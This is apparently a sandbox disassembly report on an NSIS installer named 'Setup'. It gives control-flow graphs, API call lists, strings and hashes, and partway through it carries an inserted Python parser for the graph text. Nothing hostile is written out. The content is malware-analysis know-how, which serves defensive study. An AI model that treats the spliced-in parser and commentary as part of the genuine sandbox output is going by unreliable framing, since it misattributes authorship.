256 403aed-403af3 call 406113 244->256 260 403aa5-403aa7 245->260 247->243 247->248 248->243 254->216 256->240 262 403c02-403c1f call 406328 * 3 257->262 263 403c7d-403c85 257->263 267 403aa9-403ab3 260->267 268 403a8e-403aa0 call 40382c 260->268 293 403c21-403c23 262->293 294 403c69-403c74 ExitWindowsEx 262->294 269 403c87 263->269 270 403c8b 263->270 275 403b23-403b3d lstrcatW lstrcmpiW 267->275 276 403ab5-403ac5 call 4067aa 267->276 268->267 283 403aa2 268->283 269->270 275->240 277 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 275->277 276->240 286 
403ac7-403add call 406035 * 2 276->286 281 403b62-403b82 call 406035 * 2 277->281 282 403b57-403b5d call 406035 277->282 303 403b87-403ba3 call 406831 DeleteFileW 281->303 282->281 283->260 286->244 293->294 297 403c25-403c27 293->297 294->263 300 403c76-403c78 call 40141d 294->300 297->294 301 403c29-403c3b GetCurrentProcess 297->301 300->263 301->294 308 403c3d-403c5f 301->308 309 403be4-403bec 303->309 310 403ba5-403bb5 CopyFileW 303->310 308->294 309->303 311 403bee-403bf5 call 406c94 309->311 310->309 312 403bb7-403bd7 call 406c94 call 406831 call 405c6b 310->312 311->240 312->309 322 403bd9-403be0 CloseHandle 312->322 322->309
                                                                                                                                        APIs
                                                                                                                                        • #17.COMCTL32 ref: 004038CE
                                                                                                                                        • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                                                        • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                                                          • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                          • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                          • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                        • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                        • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                                                        • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                                                        • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                                                        • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                                                        • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                                                        • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                                                        • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                                                        • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                                                        • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                                                        • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                                                        • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                                                        • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                                                        • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                                                        • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                        • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                                        • API String ID: 2435955865-3712954417
                                                                                                                                        • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                        • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                                                                        • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                        • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 790 406301-406315 FindFirstFileW 791 406322 790->791 792 406317-406320 FindClose 790->792 793 406324-406325 791->793 792->793
                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                                        • String ID: jF
                                                                                                                                        • API String ID: 2295610775-3349280890
                                                                                                                                        • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                        • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                                                                        • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                        • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 794 406328-40633e GetModuleHandleA 795 406340-406349 LoadLibraryA 794->795 796 40634b-406353 GetProcAddress 794->796 795->796 797 406359-40635b 795->797 796->797
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                        • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 310444273-0
                                                                                                                                        • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                        • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                                                                        • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                        • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC
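The graph above for the function at 0x406328 has the usual "resolve an import by name at run time" shape: a GetModuleHandleA block, a fallback block that calls LoadLibraryA only when the module is not already mapped, and a GetProcAddress block that both routes lead into. The parser below is an added example, not part of the Joe Sandbox report or of the sample: it reads the flat `control_flow_graph` text exactly as the page prints it (block id, address range, call labels, `a->b` edges, plus the `call <addr>` and `* <n>` repeat tokens that appear in the larger graphs further down), maps the `ref:` addresses from the APIs list onto their blocks, and checks that LoadLibraryA really is only a fallback. The token grammar is inferred from the dumps on this page and is an assumption, as are the two constructed input strings, which are copies of the page's own graph text.

```python
import re

# Constructed copy of the page's control_flow_graph text for the function at 0x406328.
# Grammar (assumed from the dumps on this page):
#   <block id> <start>-<end> [API | call <addr> | * <n>]...   defines a basic block
#   <a>-><b>                                                  is an edge
CFG_406328 = ("control_flow_graph 794 406328-40633e GetModuleHandleA "
              "795 406340-406349 LoadLibraryA 794->795 "
              "796 40634b-406353 GetProcAddress 794->796 795->796 "
              "797 406359-40635b 795->797 796->797")

# Excerpt constructed from the page's second graph to exercise the "call <addr> * <n>"
# repeat syntax; edge source 58 is defined elsewhere in that graph.
CFG_EXCERPT = "74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74"

ADDR_RE = re.compile(r"^[0-9a-f]{6,}(?:-[0-9a-f]{6,})?$")  # "4015fa" or "406328-40633e"
EDGE_RE = re.compile(r"^(\d+)->(\d+)$")


def parse_cfg(dump):
    """Return ({block_id: {"range": (lo, hi), "calls": [...]}}, [(src, dst), ...])."""
    toks = dump.split()
    if toks and toks[0] == "control_flow_graph":
        toks = toks[1:]
    nodes, edges, cur, i = {}, [], None, 0
    while i < len(toks):
        t = toks[i]
        m = EDGE_RE.match(t)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
        elif t.isdigit() and i + 1 < len(toks) and ADDR_RE.match(toks[i + 1]):
            lo, _, hi = toks[i + 1].partition("-")       # single-address blocks have no hi
            cur = int(t)
            nodes[cur] = {"range": (int(lo, 16), int(hi or lo, 16)), "calls": []}
            i += 2
        elif cur is None:                                # label before any block: ignore
            i += 1
        elif t == "call" and i + 1 < len(toks):          # intra-module call target
            nodes[cur]["calls"].append("call " + toks[i + 1])
            i += 2
        elif t == "*" and i + 1 < len(toks) and nodes[cur]["calls"]:   # repeat count
            nodes[cur]["calls"][-1] += " * " + toks[i + 1]
            i += 2
        else:                                            # a named API, e.g. LoadLibraryA
            nodes[cur]["calls"].append(t)
            i += 1
    return nodes, edges


def block_for_address(nodes, addr):
    """Map a 'ref: 004063xx' call-site address from the APIs list onto its block."""
    for bid, n in nodes.items():
        lo, hi = n["range"]
        if lo <= addr <= hi:
            return bid
    return None


def blocks_calling(nodes, api):
    return sorted(b for b, n in nodes.items() if api in n["calls"])


def successors(edges, b):
    return sorted(d for s, d in edges if s == b)


def simple_paths(edges, src, dst, path=()):
    """All simple paths src -> dst by DFS; adequate for per-function graphs."""
    path = path + (src,)
    if src == dst:
        return [list(path)]
    out = []
    for nxt in successors(edges, src):
        if nxt not in path:
            out.extend(simple_paths(edges, nxt, dst, path))
    return out


def describe_resolver(nodes, edges):
    """GetProcAddress must be reachable from the GetModuleHandleA block both with and
    without passing a LoadLibraryA block, i.e. LoadLibraryA is only the fallback."""
    handle = blocks_calling(nodes, "GetModuleHandleA")
    load = blocks_calling(nodes, "LoadLibraryA")
    resolve = blocks_calling(nodes, "GetProcAddress")
    if not (handle and load and resolve):
        return None
    routes = simple_paths(edges, handle[0], resolve[0])
    via_load = [any(b in load for b in p) for p in routes]
    return {"handle_block": handle[0], "load_blocks": load, "resolve_block": resolve[0],
            "routes": routes, "load_is_fallback": any(via_load) and not all(via_load)}


if __name__ == "__main__":
    nodes, edges = parse_cfg(CFG_406328)
    for ref in (0x406336, 0x406341, 0x406353):   # "ref:" addresses from the APIs list
        print(hex(ref), "-> block", block_for_address(nodes, ref))
    print(describe_resolver(nodes, edges))
```

The rendered graph distinguishes Executed from Not Executed blocks by colour, and that colour does not survive in the text dump, so this parser recovers structure only, not coverage; whether the LoadLibraryA branch ran in this analysis has to come from the report's behavioural sections, not from this block.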

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 86 4030ee-4030f2 57->86 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->86 77 401751-401755 ShowWindow 61->77 78 401758-40175f 61->78 117 4019a3-4019a8 62->117 118 40197f-401984 62->118 63->57 123 4019ec-4019f8 63->123 64->57 136 40179a-4017a6 call 4062cf 64->136 65->86 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 137 401689-40168e call 404f9e 67->137 142 4016b1-4016b8 Sleep 68->142 143 4016ae-4016b0 68->143 69->86 94 401632-401637 70->94 92 401702-401710 71->92 93 4016dd-4016fd call 401446 71->93 96 4030dd-4030de 72->96 138 4018c2-4018d6 call 4062cf 73->138 139 4018a9-4018bd call 4062cf 73->139 172 401912-401919 74->172 173 40191e-401921 74->173 75->94 95 401647-40164e PostQuitMessage 75->95 76->57 77->78 78->57 99 401765-401769 ShowWindow 78->99 92->57 93->57 94->86 95->94 96->57 113 4030de call 405f7d 96->113 99->57 113->57 130 4019af-4019b2 117->130 129 401986-401989 118->129 118->130 123->57 123->96 129->130 140 40198b-401993 call 406301 129->140 130->57 144 4019b8-4019c5 GetShortPathNameW 130->144 155 4017ab-4017ac 136->155 137->57 138->86 139->86 140->117 165 401995-4019a1 call 406035 140->165 142->57 143->142 144->57 155->57 163 401890-401892 160->163 164 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 160->164 176 401846-40184e call 4062cf 161->176 177 4017fe-401809 GetLastError 161->177 163->137 164->57 165->130 172->137 178 401923-40192b call 406301 173->178 179 40194a-401950 173->179 192 401853-401854 176->192 182 401827-401832 GetFileAttributesW 177->182 183 40180b-401825 GetLastError call 4062cf 177->183 178->179 193 40192d-401948 call 406c94 call 404f9e 178->193 181 401957-40195d call 4062cf 179->181 181->155 190 401834-401844 call 4062cf 182->190 191 401855-40185e 182->191 183->191 190->192 191->160 191->161 192->191 193->181
                                                                                                                                        APIs
                                                                                                                                        • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                        • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                        • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                        • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                        • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                        • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                        • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                        • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                        • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                        • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                        • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                        • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                        • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                        Strings
                                                                                                                                        • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                        • Call: %d, xrefs: 0040165A
                                                                                                                                        • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                        • detailprint: %s, xrefs: 00401679
                                                                                                                                        • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                        • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                        • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                        • BringToFront, xrefs: 004016BD
                                                                                                                                        • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                        • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                        • Jump: %d, xrefs: 00401602
                                                                                                                                        • Aborting: "%s", xrefs: 0040161D
                                                                                                                                        • Rename: %s, xrefs: 004018F8
                                                                                                                                        • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                        • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                        • Rename failed: %s, xrefs: 0040194B
                                                                                                                                        • Sleep(%d), xrefs: 0040169D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                        • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                        • API String ID: 2872004960-3619442763
                                                                                                                                        • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                        • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                                                                        • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                        • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 331 4054d4-4054e1 SetWindowPos 326->331 332 4054e7-4054ea 326->332 329 4056ac-4056b1 call 403ddb 327->329 330 40566e-405671 327->330 328->327 342 4056b6-4056d1 329->342 334 405673-40567e call 40139d 330->334 335 4056a4-4056a6 330->335 331->332 337 405504-40550a 332->337 338 4054ec-4054fe ShowWindow 332->338 334->335 356 405680-40569f SendMessageW 334->356 335->329 341 40594c 335->341 343 405526-405529 337->343 344 40550c-405521 DestroyWindow 337->344 338->337 351 40594e-405955 341->351 349 4056d3-4056d5 call 40141d 342->349 350 4056da-4056e0 342->350 346 40552b-405537 SetWindowLongW 343->346 347 40553c-405542 343->347 352 405929-40592f 344->352 346->351 354 4055e5-4055f4 call 403df6 347->354 355 405548-405559 GetDlgItem 347->355 349->350 359 4056e6-4056f1 350->359 360 40590a-405923 DestroyWindow KiUserCallbackDispatcher 350->360 352->341 357 405931-405937 352->357 354->351 361 405578-40557b 355->361 362 40555b-405572 SendMessageW IsWindowEnabled 355->362 356->351 357->341 364 405939-405942 ShowWindow 357->364 359->360 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 359->365 360->352 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 372 405591-405596 366->372 373 405585-40558b 366->373 371 4055ae-4055b3 call 403d44 367->371 371->354 376 4055cc-4055df SendMessageW 372->376 378 405598-40559e 372->378 373->376 377 40558d-40558f 373->377 376->354 377->371 381 4055a0-4055a6 call 40141d 378->381 382 4055b5-4055be call 40141d 378->382 391 4055ac 381->391 382->354 390 4055c0-4055ca 382->390 390->391 391->371 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->352 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 418 405845 415->418 416->352 417 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->417 417->341 423 4058f0-405903 ShowWindow call 403ddb 417->423 418->341 425 405908 423->425 425->352
                                                                                                                                        APIs
                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                                                                        • ShowWindow.USER32(?), ref: 004054FE
                                                                                                                                        • DestroyWindow.USER32 ref: 00405512
                                                                                                                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                                                                        • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                                                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                                                                        • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                                                                        • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                                                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                                                                        • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                                                                        • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                                                                        • EnableWindow.USER32(?,?), ref: 00405783
                                                                                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                                                                        • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                                                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                                                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                                                                        • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                                                                        • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                                                                        • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3282139019-0
                                                                                                                                        • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                        • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                                                                        • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                        • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

Control-flow Graph (graph image for function 00405958; edge dump omitted)
APIs
  • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
  • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
  • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
• lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
• lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
• lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
